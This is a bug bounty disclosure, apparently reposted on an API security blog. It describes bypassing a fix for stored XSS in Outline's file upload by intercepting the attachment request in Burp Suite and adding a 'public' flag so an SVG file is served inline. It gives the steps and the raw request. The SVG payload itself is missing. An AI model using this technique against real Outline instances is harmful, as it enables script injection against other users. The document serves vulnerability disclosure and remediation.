Site icon API Security Blog

[Bypass] Cross-site Scriptin (XSS) via file upload

# ?? Requirements

Privileges: User.

# ? Description

I found a bypass to [this report](https://huntr.dev/bounties/b15b3291-d56e-4228-8f3c-b692cc27568c/) by uploading the file with `”public”: true,` parameter. This is due to the fact that AWS bucket public folder does not `auto download` files when we access them.

# ????? Proof of Concept

*Step 1*: Go your outline `home` and create a new note.

![new-note.png](https://i.imgur.com/sVvRgEV.png)

*Step 2*: Start burp suite with `proxy` -> `Intercept is on`.

![burp01.png](https://i.imgur.com/H802SWO.png)

*Step 3*: Add in the note, the following `.svg` file by taping `/file` and `[ENTER]`.

“`html

“`

*Step 4*: On burp suite, press `Forward` until you see:

“`
POST /api/attachments.create HTTP/1.1
Host: esaipslack.getoutline.com
Content-Length: 111

Connection: close

{
“documentId”: “b4f14bcb-d6c0-4439-8380-324c1abf00ca”,”contentType”: “image/svg+xml”,
“size”:129,
“name”:”xss.svg”
}
“`

*Step 5*: Add `”public”: true,` inside the JSON.

“`json
{
“public”: true,
“documentId”: “b4f14bcb-d6c0-4439-8380-324c1abf00ca”,
“contentType”: “image/svg+xml”,
“size”: 129,
“name”: “xss.svg”
}
“`

*Step 6*: `Forward` and turn `Intercept` to off.

![burp02.png](https://i.imgur.com/fZXlq1L.png)

*Step 7*: Go to your note and click to the file.

– File

![file.png](https://i.imgur.com/36H3EYj.png)

– XSS

![xss.png](https://i.imgur.com/M3KBdTL.png)

# ? Fix

To fix this vulnerability, I suggest you to force download on the public part of the AWS bucket too.Read More

Exit mobile version